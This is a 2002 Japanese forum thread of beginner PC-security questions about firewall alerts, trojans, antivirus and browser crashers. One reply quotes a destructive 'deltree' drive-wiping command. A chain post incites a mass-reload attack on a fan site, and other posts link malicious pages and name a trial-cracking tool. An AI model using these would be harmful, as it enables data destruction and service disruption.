egret.sookmyung.ac.kr (pri=20)接続に失敗:ネットワークが混雑しているか、サーバが停止している可能性があります。
cc.sookmyung.ac.kr (pri=10)
< 220-InterScan Version 3.6-Build_1166 $Date: 04/24/2001 22:13:0052$: Ready
< 220 cc.sookmyung.ac.kr ESMTP Sendmail 8.9.3/8.9.3;> HELO rlytest.nanet.co.jp
< 250 cc.sookmyung.ac.kr Hello localhost [127.0.0.1], pleased to meet you
> MAIL FROM:< http://www.nanet.co.jp/rlytest/[email protected] >
< 250 < http://www.nanet.co.jp/rlytest/[email protected] >... Sender ok > RCPT TO:<[email protected]> < 250 <[email protected]>... Recipient ok
> QUIT< 221 cc.sookmyung.ac.kr closing connection
問題あり:不正な中継を受け付けます。
(203.252.201.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。
689名無しさん@お腹いっぱい。:02/01/30 19:11
(゚Д゚)ハァ?
>>696
ファイアウォールを適切に設定してればすべてStealthになるYO!

セキュリティに興味があるならこのへんのセキュリティチェックもやってみるといい。
これもちゃんとしてればすべて問題なしになる。
http://hackyourself.com:4000/startdemo.dyn
691名無しさん@お腹いっぱい。:02/01/30 21:14
隣の机の人のパソコンが、突然「エリーゼの為に」を鳴らすんですけど、
ボリュームコントロールも全然効かないし、電源落とすまでずっとでかい音で、
悪趣味な着メロみたいなメロディーを延々と聞かされます(拷問に近いものがあります)。
お隣の人は、原因がわからないそうですが、もしかしてこういうウイルスがあるんでしょうか。
でもウイルスデータベースやいろいろ調べても、それらしいのは見つからないし…。
同じような経験ある方いらっしゃいませんか?
692名無しさん@お腹いっぱい。:02/01/30 22:01
>690さん
NIS2002入れててファイアウォール設定を最高にしてますが
3つしかstealthになりませんのですが。
>>690 (゚Д゚)ハァ?
なにか間違ったこといってるか?おれも全部ステルスだが。
695名無しさん@お腹いっぱい。:02/01/30 22:42
Norton Internet Security 2001 Ver.3.0の体験版を一度インストールし、
試用期間が終了したのでアンインストールしました。
その後、また使いたくなったのでインストールしようとしたら、途中で
バグったような感じになったのでキャンセルを押したのですが何故か
インストールされたことになりました。
Windowsmeを起動すると、ノートンアンチウィルスは初期化されませんでした
と赤い背景で表示され、
アンインストールしようとするとNorton AntiVirusのnav95.isuが無いので無理と表示され、
コントロールパネル、システムの復元、Cドライブの中身がウィンドウは
開けるのですが見ることも選択することも出来なくなりました。

win板の方の助言でもっかいインストールしてみましたが、だめでした。
どういうことが問題なのかもさっぱりわかりません。
誰か助けてください。。。
書くとこ間違えました・・・
>>692
私はTinyなのでNISはよく分かりませんが、stealthじゃなくてもcloseなら良いと思います。

>>691
だれかのいたずらではないですか?w
>>690
いや間違ったことは言ってないが、誰へのレス?
>>695
第一に、試用版なので期限が切れたらもう一度入れたってソフトは動かない。
期限残してアンインストールしても日数はカウントされている。
第二に、インストール中変な操作をしたためファイル内容が狂ってて、まと
もに起動できない状態な上にアンインストールに必要なisuファイルもできて
ない。結論としてこれ以上ソフトのインストールをやっても無駄なので、
OS入れ直しだね。HDD内容全部抹消すればソフトのインストールで
また30日使えるようになるけど。
DateCracker2000
701(゜▼゜*):02/01/31 02:19
>>695
起動ディスクで立ち上げて
SCANREG /RESTORE
で、いい状態のバックアップ(日付で判断)から
復旧したら、ひょっとしたら治るかもしれない。
702EXE:02/01/31 10:43
多段プロキシってどこにあるん?
>>702
板違い
>>702
そんなものはない。プロキシを何個も刺して、多段にするんだよ。
705名無しさん@お腹いっぱい。:02/01/31 19:02
ノートンインターネットセキュ使ってます。

Date: 2002/01/31 Time: 3:56:17
Rule "Default Block NetBus Trojan horse" blocked (172.170.170.133,NetBus(12345)). Details:
Inbound TCP connection
Local address,service is (172.170.170.133,NetBus(12345))
Remote address,service is (172.170.170.234,1199)
Process name is "N/A"

これ今日4回きました。
これにはどう対処すればいいのですか?
まったくの初心者でごめんなさい。
>>705
初心者は見なかったことにする。これ。
707名無しさん@お腹いっぱい。:02/01/31 19:08
((*'д'*))教えてください・・・
オネガイシマス。
>>705
AOLのちがうユーザーさんからのアタック?もしくは検知ミス
709名無しさん@お腹いっぱい。:02/01/31 19:13
>708
そうだと思います。見当はついていますが、はっきりしません。
というのは、前に一度その人にトロイを仕込まれたことがあって、それから
「もうしない」とは言ってはいるものの、いまいち信用できないんです。
710名無しさん@お腹いっぱい。:02/01/31 19:14
あと、上のコピペでワタシの情報はばれるもんなんですか?
このコピペはどういうふうに見たらいいんでしょうか。
とりあえずプロバイダがAOLだと分かる。
ポートが開いてないかスキャンされています(この場合 ポート12345 トロイの木馬NetBusで使用)

あなたのPCにトロイが入ってない限りポートスキャンされても平気です。
712名無しさん@お腹いっぱい。:02/01/31 19:22
そうなんだぁ
ありがdございました!

トロイ入ってないことを祈ってmath
713705=712:02/01/31 19:55
どうでもいいけどまた同じ人からアタックきました。
714名無しさん@お腹いっぱい。:02/01/31 20:01
madokaに感染した場合、どうすればいいでしょうか?
716名無しさん@お腹いっぱい。:02/01/31 21:28
「悪意あるプログラム」ってどうやって検出すればいいんですか?
717名無しさん@お腹いっぱい。:02/01/31 21:32
crazyghostってヤバイですか。
ヤバくない
719名無しさん@お腹いっぱい。:02/01/31 21:44
かなりヤバイ。
多分お前捕まる、もしくは殺される
>>716
まず、「悪意」を定義しろ。
721[email protected]:02/01/31 23:14
Received: from cc.sookmyung.ac.kr (203.252.201.4) by sitemail.everyone.net with SMTP; **
Received: from vv68gIjB6 (localhost [127.0.0.1]) by cc.sookmyung.ac.kr (8.9.3/8.9.3) with SMTP id ** (KST)
From: [email protected]
Date:**
Subject: Need Help? Benefactored Program...hurry don't miss out!
---
Hello Friends,
If you need HELP and would like to be benefactored
into a new FABULOUS
program, please let me know right away!! I will put
you into a
"temporary" matrix to hold your position until the
company allows us to enter
people on Feb. 4! The overflow will be enormous.
Please reserve your
spot now!
Send your info to
[email protected]
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to me [email protected]
---
egret.sookmyung.ac.kr (pri=20)
接続に失敗:ネットワークが混雑しているか、サーバが停止している可能性があります。
-----
cc.sookmyung.ac.kr (pri=10)
< 220-InterScan Version 3.6-Build_1166 $Date: 04/24/2001 22:13:0052$: Ready
< 220 cc.sookmyung.ac.kr ESMTP Sendmail 8.9.3/8.9.3;
> HELO rlytest.nanet.co.jp
< 250 cc.sookmyung.ac.kr Hello localhost [127.0.0.1], pleased to meet you
> MAIL FROM:< http://www.nanet.co.jp/rlytest/[email protected] >
< 250 < http://www.nanet.co.jp/rlytest/[email protected] >... Sender ok
> RCPT TO:<[email protected]>
< 250 <[email protected]>... Recipient ok
> QUIT
< 221 cc.sookmyung.ac.kr closing connection
問題あり:不正な中継を受け付けます。
(203.252.201.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。
>>721
ウザい
最近暇にまかせてセキュリティ厨になってるんですが、
NIS2002,BlackIce,Proxomitron,Ad-aware,Javaオフ、クッキーオフ
にしてあるんですが他にセキュリティ向上のためにできることはありますか?
あとOutlookは使っていません。
・ 知らない人に話しかけられてもついて行かない
・ 外から帰って来たら手を洗ってうがいをする
・ 暖かくして寝る(寝る前にホットミルクなどを飲むと良い)
  
>>724
ごめん、つまらない
               ∧_∧
  ∧_∧ エイッ!    (゚Д゚__)←>>726
 ( ´∀`)         ⊂_⊂| 〃´
 (つ===つ===========≠ /=⇒
 | | |       ⊂_⊂ノ ヾ`
 (__)_)
>>723
・ネットに繋がない。
・FD、CD、MOその他リバーシブルディスクを持ち込まない。
>>728
リバーシブルワラタ
Comment: For info see http://www.gnupg.org

mQGiBDxZoIYRBACSeBXDLEfXfW9IGh0kclU59O7Yw5oLye2gSF77nyaR6+eGh/Qs
RrQ8N/i0366CtPPFMAJEHdR/6atK9gYvHMs/IEssDr6bK7w8fQj0txazJwHAzd4P
9jTa4D0mU4a6Ab6gUO6hYe3A9Jqrs5EjDoKr4F815Au3BomkLg5spdSqAwCgi1nT
aED2RyurLKz2cIczFt5ClUED/RVIK9d0DOutZQjnhFLL8HBPnOWOv/8fBEk+b8Wo
i1t9sc2XXzh8PDu2OHMuyx7R+v7Psm6j4q1pwpRS88YW3kHW0rj5qeoebk1eyNfN
IEQk0Zh/ZpQjgXERm9zt6plLP1+/nhbAeay/WuZYbucK6dUJC4wdc+INUTAsCcJj
wy9eA/9eTXRHg0mEC6WUIq45yV8ADH1HI4my2F6BVSeU0z6OaHhg9iC9deJUMz5+
Lak0cn/Fn3cIw+sS3qJ8Qx+kiAai9p2lHJzRu9OLXLkJh0UJ16FQ7FpG7sacvEb8
OFCOkdGNGLHiA+hTM1dPkPFhBPfkaPL+v9QWGqdtbmyRVO9z7rQaaG9nZWhvZ2Ug
PGluZm9AYTRldmVyLm5ldD6IVwQTEQIAFwUCPFmghgULBwoDBAMVAwIDFgIBAheA
AAoJEDQ0Pppzr2MIs7AAn07qHUgEatuvV6icxH+Ou6NksKXvAJ9EguDqXWpdjW1p
acW8NkT8AN1NgrkBDQQ8WaCMEAQAgwouJcKLAC2w7dsgsjNFK+fu3BSOlk1ms/il
aaB3dRtyA9DabW7wWOW80EN18szv7C1FrO1/a1OZWURz40TvtAVP+Hx5ZjrxEf6G
XfOnOa28D611bGMrmwSHRS5BqDjmNAiqI53JtMMM15grIY1R9EZ9XetRcDnqjcPv
br3UdGcAAwcD/AjuALtZH6L+L+VWm2iqj6OhZg8stUPchRyqSlAPaZmUiSHkSJxm
+DOG+PYqsxPR4C0F1Lm8rr6wc3nf7BiSUPFK6A0VetaUU374lN/DQ4K5HXchkCU0
KSlg8l7ISimCil4mwEl+YtI6TwsXfkcThXiKMm/P5ZtWQSNxcWpY3SJeiEYEGBEC
AAYFAjxZoIwACgkQNDQ+mnOvYwiwSACfda4sRD0uLLkrSowE9ZIoUiacOCAAn3cU
ft5aDXdlFmiroWs/KHlmR+Dx
=PYrs
-----END PGP PUBLIC KEY BLOCK-----
732名無しさん@お腹いっぱい。:02/02/01 12:21
ノートンアンチウイルスってスパイウェアも検出すんの?
733名無しさん@お腹いっぱい。:02/02/01 12:30
それは無理
734名無しさん@お腹いっぱい。:02/02/01 12:34
OutpostでWinMX使う時はICQプリセットにしておけばいいのですか?
735名無しさん@お腹いっぱい。:02/02/01 12:39
Ad-aware って日本語?
>>734
板違い

>>735
違う
737名無しさん@お腹いっぱい。:02/02/01 13:27
セキュリティソフトを買いたいんですが
初心者の私に向いているのってありますか?
今、私のPCにはセキュリティソフトが入ってないので
かなり恐いです。
最近はメール見るだけで感染するウイルスとかありますし・・・。
前にINSで、上手くいかずにアンインストールしてますし
今度は慎重に選択しようと思ってます。
一体、どれが一番使いやすいのか・・・。
>>737
INSってNISの打ち間違いか?
だったらウイルスバスターにしとけば?
いくらうまくいかなくてアンインストールしたからと言って
無防備のままネットに繋ぐのはある意味あなたが犯罪
739妄想野郎 ◆WqONWcU2 :02/02/01 16:42
ここでいいかなぁ?

自分の自宅、または携帯電話の電話番号がネット上で晒されている
可能性がある場合、該当のサイトを探すのに一番適した方法を教えて下さい。
ttp://myhome.hananet.net/~crazyghost/goto.htm
最近このアドレスをよく見かけるんですけどヤバイのでしょうか?
何がどのようになるのか教えてください。
スレ違いならごめんなさい
>>741
女の幽霊の画像が貼ってあるだけ。
作り物っぽいし、正直言って恐くなかったYO!
743名無しさん@お腹いっぱい。:02/02/01 18:32
インターネットセキュリティ体験版をインストールしましたが
製品登録で「SSLを経由した接続が確立できません」となってしまいます。
どんな原因が考えられるのでしょうか?
Win2k,eAccessです。
質問してもいいけど回答に何の反応もないのね
いやになっちゃう
回答に関してレスしてくれる人には答えてあげてもいいけど
745名無しさん@お腹いっぱい。:02/02/01 18:42
http://gakielkupo.tripod.com/index.html

ここにおいてあるのはシステム破壊プログラムですか?
>>743
なぜ体験版を登録するんですか?
747名無しさん@お腹いっぱい。:02/02/01 19:19
AD-Awareってなんて読む?
あど・あわれ
>>746
登録しないもんなんですか?
登録とライセンスキー購入は別だと思ってたんですが。
厨房な質問ですみませんでした。
750妄想野郎 ◆WqONWcU2 :02/02/01 20:30
・・・普通のサーチエンジンごときで探せたら苦労しねぇよっての。
あほか?

それにどうせ薦めるならちったぁまともに電話番号検索できる
http://www.lycos.co.jp/
の方を薦めろよ。タコ。
>>750
        ∫
   ∧,,∧ ∬       / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ミ,,゚Д゚ノ,っ━~  < ふぅ。 逆ギレですか? みっともない。
_と~,,,  ~,,,ノ_. ∀  \______________
    .ミ,,,/~),  .| ┷┳━
 ̄ ̄ ̄ .し'J ̄ ̄|... ┃
 ̄ ̄ ̄ ̄ ̄ ̄ ̄   .┻
752名無しさん@お腹いっぱい。:02/02/01 20:53
VINTAGE SOLUTIONSの簡易版アンチドートで「Trojan.Win32.Vise感染」と
認識されるファイルがあるんですが、トレンドマイクロのオンラインスキャン
ではそのファイルは感染なしとでます。また各社のウイルス辞書で
Trojan.Win32.Viseを検索しても該当するウイルス名が見当たりません。
Trojanなんとかってのはいっぱいでてきたんですけど・・・。
753名無しさん@お腹いっぱい。:02/02/01 21:24
Safeモードになってしまう理由って何ですか?
ネット見てて、フリーズした挙句、画面が青くなって例外なんとかが・・・っていうメッセージのあとどうにも動かないんでリセットボタンで電源落として再起動したらSafeモードになったんです。
Win98 IE5sp2です。
754 :02/02/01 22:20
>>753
理由はWinが気を利かせてくれているから。
周辺機器がらみでよくブルーバックエラーが起こることが多いし、
それで正常終了しなかった場合には、HDDなどに問題が生じている
可能性があるので、セーフモードで十分調べなさいってこと。
とりあえずセーフモードでスキャンディスクとかやって
大丈夫なようなら再起動すると通常になるはず、
ならなかったら、Ctrlキーとか押しながら立ち上げると、
起動モードを選べるので、ノーマルを選ぶといい。
多分ctrlキーでいけるはず。
755名無しさん@お腹いっぱい。:02/02/01 23:26
zonealarmについて質問っす。
小規模な家庭内のLAN作ってます。
構成は、
ブロードバンドルーター with DHCP
ルーターのIP:192.168.2.1
クライアント数:2台
クライアントIP:DHCP
範囲:192.168.2.2〜192.168.2.40
サーバー:現時点ではなし(ファイルサーバーとプリントサーバー近日予定)
です。

で、zoneのセキュリティ-advancedの設定について。
LAN内のPCをローカルにしてやらないとイカンと思うですが、この場合、
other computersでIPrangeを設定すりゃいいかと。
そのrangeの開始IPの値は
192.168.2.1 (ルーター含む)
192.168.2.2 (ルーター含まない)
のどっちにするんでしょーか?

それと、アダプターサブネットの項目にNICが出てるんですが、コイツには
チェック入れないとイカンですか?

以上、教えてみろ。
よろしくお願いします。

756cheshire-cat:02/02/01 23:55
んな小規模のLANでDHCP立ち上げること自体間違っているかと。
IPアドレスの設定を自動じゃなくて、個別に指定しなければ意味ないんじゃ?
ちなみにローカルなら、わざわざ推奨されたIPアドレス使う必然性は無い。
SubSeven Trojan horseというのに侵入されそうになったんですが、
こいつはすでに何か内部に仕込まれているんですか?
トロイの木馬だからもう内部にいるのかと思ったのですが。
758755:02/02/02 00:35
>>756

>んな小規模のLANでDHCP立ち上げること自体間違っているかと。
ってか、ルーターのマニュアルでデフォでDHCP使うように
なってたから、そのまんまにしてるだけなんす。
あんまりよくわからんし・・・

>IPアドレスの設定を自動じゃなくて、個別に指定しなければ意味ないんじゃ?
>ちなみにローカルなら、わざわざ推奨されたIPアドレス使う必然性は無い。

つまり、テキトーなローカルIPを各端末ごとに設定、ってことですな。
その方がいいんであれば、そうするです。
ただ、この場合もルーターのIPも明示的にローカルとしなきゃいけない
んでしょーか?
759名無しさん@お腹いっぱい。:02/02/02 01:57
浜崎あゆみファンサイトの掲示板を潰すのもいいだろう。
チャットを乗っ取るのもいいだろう。
しかし、それはあくまで序章に過ぎない。
来たる2002年2月2日22時22分22秒、2ちゃんねるによる本丸攻略が開始される・・・

公式サイトがF5連打で攻め落とされるか、それとも攻略に失敗するか、いざ勝負!
公式サイト   http://www.avexnet.or.jp/ayu/

事の概要
カウントライブでの出来事。 アンコールの後、浜崎のMCが始まった。
その時最前近くにいた客が座った。 すると浜崎が「なにあれ、座ってる。感じ悪。どうよこれ?」 と客に同意を求めたところ当然客からはその子にブーイング。
その子は足が悪い子でたまたま座っただけだったのに 浜崎はそれを知らずにその子を非難した。
その子は泣き出すし大変だったらしい。
このレスをみて同意した方は同じ文面を手近なスレに貼り付けてください。多いほど良し!
詳細は↓ココで
http://tv.2ch.net/test/read.cgi/ami/1012570770
>>759
チェーンレスやめれ
ブラクラ・ウイルスです!!
ttp://www.geocities.com/ccsacla/images0012.jpg

これを開いてしまい即、強制終了させましたが、どのような害があるでしょうか?
20分くらい前にやってしまったのですが今のところ異常はありませんが
非常に心配です。素人なんでどうすればいいのか教えてください・
>>761
レジストリ書き換えやら、mailtoストームやら、conconやら
いろいろ複合されてて、ややこしい。
とりあえずスタートページが書き換えられてるはずだが、
直し方はよーわからん。
起動ディスクで立ち上げて、scanreg /restore で
踏む前のレジストリを選べば直りそうな気もする。
763名無しさん@お腹いっぱい。:02/02/02 04:19
なんかVB2002のPFWがsub seven ブロックしたって
言ってんですけどその送信元が自分のIPなんです。
で送信先は62.71.168.19になってるんだけど
これって感染しちゃってるんでしょうか?

ウイルス検索はしてみましたが感染は検知
されなかったです。
プライスロトはなんだったの?
>>763
VB2002のFW機能って、アウトバウンドは監視しましたっけ?
単にsub seven のポートにアクセスされただけでは?
766エフェドリンながヰ:02/02/02 05:41
http://www.puchiwara.com/hacking/
これなんかいいと思うのだが……‥‥・・
  「いっせー」
   /■\  /■\
  ( ・∀・) ( ´∀`)
 ⊂    つ⊂    つ
  .人  Y   人  Y
  し'(_)   し'(_)
  「のー」
   /■\  /■\
  (・∀・ ) (´∀` )
 ⊂、   つ⊂、   つ
    Y 人    Y 人
   (_)'J   (_)'J
  「で」
  /■\  /■\
 ( ・∀・ ) ( ´∀` )
 ( つ⊂ ) ( つ⊂ )
  ヽ ( ノ  ヽ ( ノ
 (_)し'  (_)し'
   「あげ!!」
  /■\   /■\
 ∩ ・∀・)∩∩ ´∀`)∩
  〉     _ノ 〉     _ノ
 ノ ノ  ノ  ノ ノ  ノ
 し´(_)   し´(_)
767名無しさん@お腹いっぱい。:02/02/02 05:45
768757:02/02/02 05:46
>>763
自分も同じトロイが来たよ。
昨夜はなにかあったのかなあ?
769716:02/02/02 08:18
「悪意あるプログラム」について。
これは,どこかのネットセキュリティの協会の語で,幅広く定義されているようです。
で,以前「LOVE MACHINE」というツールをDLぢて使っており,その後もHDDの中に
入れたままなんですけど,これどうでしょう?
770おしえてください:02/02/02 08:27
博識に富む先生方に御教授いただきたく、質問をします。よろしくお願いします。
ネット上でプライバシーの問題が叫ばれる現実を鑑みて
今日初めて特命プロクシを設定してみました。
しかしひとつ疑問があります。
プロキシつかったまま例えばウェブメールにログインしたとしたら、パスワード等が
プロクシ側に漏れるんじゃないですか?大丈夫ですか?
>>761
本当大馬鹿なんですけど、
ブラクラ踏んだ時のスクリーンショットかと思って、
(よく考えたらブラクラ踏んでそんなのんきな事する奴いないか…)
クリックしてしまいました。
プログラム起動時に音を鳴らすようにしてるんだけど、
その音が鳴りっぱなし。こわかったー。
すぐ再起動して>>762のやり方でレジストリ復活させました。
スタートページも変わってなかったし、OE使ってないし、
IEにも最新パッチ当ててるし、特に変わったこともないので、
ちょっと安心してるんですが。
本当、こういうので気をつけなくちゃって思いますね。
772名無しさん@お腹いっぱい。:02/02/02 09:06
>>770
博識にも富んでいないし、先生なんてとんでもないが。

一つ疑問があるが、特命って匿名か?
何か特別なプロキシのことなら俺は知らないぞ。
まあ、それはおいといて。

そういう心配があるなら、プロクシは使わない方がいいね。
絶対に安全とはいえないもの。
使うんだったら、管理者はそういう信義に反することはしないと
信用するか、
膨大な情報の中から、特にパスワードを抜き出すのは
とても大変だろうからと安心するか、
でないと。
773   :02/02/02 09:09
みなさん、こんばんは。
しばらくは、オフ会の案内を最初に書き込ませていただきますのご了承願います。
今回で3回目になるオフ会を3/2(土)の16:00位から、都内某スペースで開催します。
普段は出来ない靴談議に花を咲かせて、心地よい一時をすごしませんか。
テーブルには自然と靴が並び、靴好きにとっては、見ているだけでも話がとても盛り上がります。
今回は、特別なゲストとして、雑誌などによく登場なさいます靴関連のジャーナリストの井伊さんにも参加いただける運びとなっています。
さらには、ある方のご協力により、靴爆買いヨーロッパツアー実現に向けての取り組みもスタートします(アンケートなどの実施)。
敷居は高くなく、とっても気さくな雰囲気ですので、初めての方でも、気軽に参加して下さい。
いわゆる本格靴を持っていなくてもいいですし、服装も自由とさせていただいています。
参加希望の方は、お手数ですが、2/25までにメールを下さい。
メールをいただいた方だけに、開催場所等の連絡をさせていただきます(2/25以降)。

まだ会社です。
>>772
上り(のPOST)だけキャプチャするだけだから意外と簡単よん。
775 :02/02/02 09:51
すいません、フリメのアドレスを公開した途端、デスクトップに「mitene」という
名前のメールらしきアイコンが突然現れました。これはんでしょうか?
怖いので開いていないのですが。
776名無しさん@お腹いっぱい。:02/02/02 09:58
もう侵入されている。有料エロサイトへの誘導だと思う。
ダイアルアップの設定が書き換えられていないか確認しろ。
右クリックでプロパティを確認しろ。
その時に送られたメールをここに貼り付けろ。
777 775:02/02/02 10:09
>>776
メールには何も送られてきてないです。一応、ケーブルでつないでいるのですが。
>>777
捨てればいいでしょ、そんなファイル。

しかしメールを受け取ってないのにそんなファイルができるとは
考えられないね
ウイルス対策してないのかな?
>>777 共有してて親切な人が教えてくれたとか。
780名無しさん@お腹いっぱい。:02/02/02 11:41
ノートンアンチウイルス2002ですがウイルススキャンを
システム起動時にスケジュールしているのですが
スキャンをしたりしなかったりです。
どうしてでしょう?
WinXPでzoneも使っています。
,[02/Feb/2002 11:53:56] Rule 'trojan low port': Blocked: Out UDP, localhost:68->(null) [255.255.255.255:67], Owner: C:\WINDOWS\SYSTEM\KRNL386.EXE
1,[02/Feb/2002 11:54:00] Rule 'trojan low port': Blocked: Out UDP, localhost:68->(null) [255.255.255.255:67], Owner: C:\WINDOWS\SYSTEM\KRNL386.EXE
1,[02/Feb/2002 11:54:04] Rule 'trojan low port': Blocked: In UDP, (null) [0.0.0.0:68]->localhost:67, Owner: no owner
1,[02/Feb/2002 11:54:04] Rule 'trojan low port': Blocked: In UDP, (null) [0.0.0.0:68]->localhost:67, Owner: no owner

zoneからtinyに変えてこのようなLOGが残る。
トロイに感染?
ルールの設定ミス?
心配ないのかな

誰かHELP
782名無しさん@お腹いっぱい。:02/02/02 12:15
セキュリティ関連なのか不明なのですが、一部のサイトにのみ
つながらないという状態なのです。原因は分かりませんでしょうか?
家には2台のPCがあり、両方フレッツISDNでつないでいます。
つながらないページは、特にヤフーのトップにつながらず
困っております。原因について少しでも心当たりがある方は、
よろしくアドバイス願います。
>>782
TAの電源をいれ直してみたら?
プロキシは外しているか?
785 :02/02/02 16:11
>>781

BootPCでは?
786名無しさん@お腹いっぱい。:02/02/02 17:22
24時間接続可能な環境になりました。
何か気をつけたら良い点などありましたら、ご教授ください。
ちなみにサーバのあるマンションでLAN接続、サーバにはfirewallがあるそうです。
初心者で何をどうしてよいかわかりません。
>>786
まずこのスレの始めの方にあるリンク先を読んで、その上で疑問になったことを質問すると良い。
>>781
DHCPだよ。利用してないのなら切っちまえ。
ネットワークのことをよく理解しないうちは
その 'trojan low port' とか'Trojan High Port'とか
そういうルールは要らない。あると混乱するだけだ。
自分でルール作っておいてたまたま表示されたルール名に驚く、
これ良くあるパターン。
>>788

ありがとう
その通りですね
一端、ルール破棄して作り直しました。
順序も大事だと気づきました
790名無しさん@お腹いっぱい。:02/02/02 22:55
http://gakielkupo.tripod.com/index.html

ここにおいてあるのはシステム破壊プログラムかどうかわかるかた
はいらっしゃいませんか?
791名無しさん@お腹ゲフー:02/02/02 23:00
今さらノートンインターネットセキュリティ2001入れたら、起動時にCドライブやDドライブの
フォルダが開きます。どっちかだけ開く時もあれば、開かない時が。
なんなんでしょ??
792お願いします:02/02/02 23:00
なんか友達のHP見てからか分かんないけど、
ネット上の一部の文字が「・」になっちゃうんだけどどうして?
誰か教えてください。あと治し方もお願いします。
>>790
これはヤバいよ

deltree/y c:\*.*(Cドライブ全削除) ←こういうautoexec.batが作成されたりする。


今から掃除します。。
794782:02/02/03 00:39
>783
電源を入れなおしたらいきなり直りました。
おかげでたまっていた某サイトの日記を見ることが出来ました。
ありがとうございます。

>784
そちらの方では見れました。ありがとうございます。
795名無しさん@お腹いっぱい。:02/02/03 09:43
>>793
やっぱりそうですか。なんかあやしかったんです。
ありがとうございます。
796名無しさん@お腹いっぱい。:02/02/03 12:14
◇◆真隠し部屋への道◇◆のパスキボーン!
参照↓
ttp://private.rocketbeach.com/~mms1648/ura/kakusi.cgi
797名無しさん@初心者:02/02/03 12:49
すみません さっきBlack iceで
「危険」と出たんですが

[回避] 攻撃者は、TCP 接続のハイジャックを
試みている可能性があります。

これは、回線切ったほうが良いのでしょうか
もう遅い?(アセ
ノートン何も反応しないし(鬱
[回避]
この文字が見えないの?
799名無しさん@お腹いっぱい。:02/02/03 13:04
SRCENCを解除する方法は、何処で質問したらいいですか?
教えてください。
800名無しさん@初心者:02/02/03 13:08
>798
すみません…慌て過ぎてました<回避
有り難うございます
8011:02/02/03 14:02

Hotmailなのに場所を見抜かれた(ジャブって何?)
UGサイトに逝き、メールを出したら ○○県○○市で、地元もプロバイダー
を使ってるねなどと見抜かれた. ジャブを打てば分かるよって言われたんだけど
ジャブってなに?

>>801
明日のために その1だ。
803   :02/02/03 14:18
Hotmailでも、
メールのヘッダにはあなたのPCのIPアドレスが残るハズです。
だから、プロバイダも判るし、アクセスポイントを推測もできる
804名無しさん@お腹いっぱい。:02/02/03 17:32
Win98でノートン2001入れてます。スレ最初の方で紹介されてるad−aware
(スパイソフト発見ソフト)を試したら2つファイル見つかりました。
 c:WINDOWS¥cookies規定@sextracker(1)txt
 c:WINDOWS¥cookies規定@counter15.sextracker
これってヤバイものですか? それとも名前からしてとても恥ずかしい
ものが残ってるとか・・・。
805名無しさん@お腹いっぱい。:02/02/03 17:39
>>797
警告にビビる初心者は多いが、
警告が出ているということは、多くの場合は防御も効いているということ。
本当にヤバいのは警告が出ない。
806804:02/02/03 18:08
すんません、専用スレありましたね。
sextrackerで検索したらとんでもないもん見ちゃったよ・・・鬱だ

ttp://www.cocktailboyz.com/senzuri/
808↑貼るなって…:02/02/03 19:40
URLで内容バレバレだし
809質問:02/02/03 20:12
超初心者な質問ですいませんが、ブラクラって何ですか?あとIP抜かれた場合どのようなことを心配するべきなんですか?またその対処方、予防方は何ですか?
初心者でいろんなホームぺをよくみているんですが、最近セキュリティのことで不安になったので質問します。どなたかご回答お願いします。
810cheshire-cat:02/02/03 20:57
>>809
PCに予想外のストレスを与えて落とす罠。メールストーム(アウトルック爆発状態)とか。ブラクラチェッカー使えば?

IPアドレスは抜かれても、職場のLANじゃなければ、せいぜいどの街に住んでいるかがわかる程度。プロバをハックしなければ詳細な個人情報はわからない。
>>809
超初心者だと…、
ブラクラとJS系Trojanの区別つかないだろう。複合もある。
Trojanの場合落ちるだけじゃ済まない。駆除や修復が必要。
812809:02/02/03 21:26
810、811さん、ありがとうございます。
Trojanの意味がわかんないっす。ウィルスのことかなんかでしょうか?
ウィルスの仕掛けてあるサイトってのは踏んでみなければ、わからないものなのでしょうか?
813名無しさん@お腹いっぱい。:02/02/03 22:56
Trojanは、トロイの木馬に由来しています。
悪意のコードを含むプログラム(スクリプト)のことです。
無害な「木馬」=「アプリケーション」に見せかけて、中に
致命的な「伏兵」=「悪意のソースコード」が含まれています。


不用意にJavaScriptを実行しないように気をつける必要がありますし、
又OSやUA(ブラウザなど)へのパッチは常に最新のものを準備しましょう。
そして、時々
http://www.trendmicro.co.jp/hcall/scan.htm
等を用いてウイルスチェックしましょう。
814名無しさん@お腹いっぱい。:02/02/03 23:20
質問なんですが、
さっき何もしていないのに、HDDがカチャカチャなったので
DOSでNETSTATしたんですけど、
すると
2XX.6X.1XX.2X:80
が、私のPCの侵入できるポートを探っているようで
1秒おきにアクセスしてきました。
これは侵入されているんでしょうか?
ネット接続を切断しても、しばらく放置しておくと勝手に接続が
確立されます。これはなにかのトロイでしょうか?
ファイアーウォールのログにはSubseven Trojanをブロックしたとあります。
あとNortonでスキャンしましたが何もみつかりませんでした。
816 :02/02/03 23:56
817 . . . . . . :02/02/04 00:01
>>815

あ、俺がコソーリ動かしました。すまん。
818809:02/02/04 00:05
813さん、ご回答どうもありがとうございました。
819名無しさん@お腹いっぱい。:02/02/04 00:09
>>814
ルータやパーソナルファイヤーウォール使ってますか?
無防備だったら入られてるかもね。
お金が無いなら、この辺がお勧め
http://www.zonelabs.com/zlpromo/za_pestpatrol_link.htm

>>815
「ブロックした」って書いてあるなら大丈夫。
警告を出さないor後からログを消す進入方法が最もスマート(怖い)。
>>815
どうせなにかの自動アップデートプログラムでしょう・・
821名無しさん@お腹いっぱい。:02/02/04 00:29
エロサイトのメルマガ配信用にメアドを書かせるHPがあるんですけど
気をつけることがあったら教えて下さい。
もちろんフリーメアドにします。
Outlook Expressでは受信しないほうがいいでしょうか?
822_:02/02/04 00:34
>>821
サーバ上で見れるメーラ使え
823名無しさん@お腹いっぱい。:02/02/04 00:35
エロサイトを運営してるようなヘボ管理人なら
神経質にならなくても大丈夫だと思われ(藁
824821:02/02/04 00:41
>>822
そこまでしたほうがいいですか。

>>823
AV会社のHPです。

もしも悪意のあるいたづらをされるとしたらどんなことが
可能なんでしょうか。
>>824
会社がそんなことするとは思えん
金儲けのためにメルマガ配信するんだしさ
接続書換えには注意ね
827821:02/02/04 00:59
参考になりました。どうも。
828名無しさん@お腹いっぱい。:02/02/04 12:29
NIS2002はスパイウエアも見つけてくれるの?
>>828
無理だと思われ
デジャヴゥ  
831名無しさん@お腹いっぱい。:02/02/04 16:19
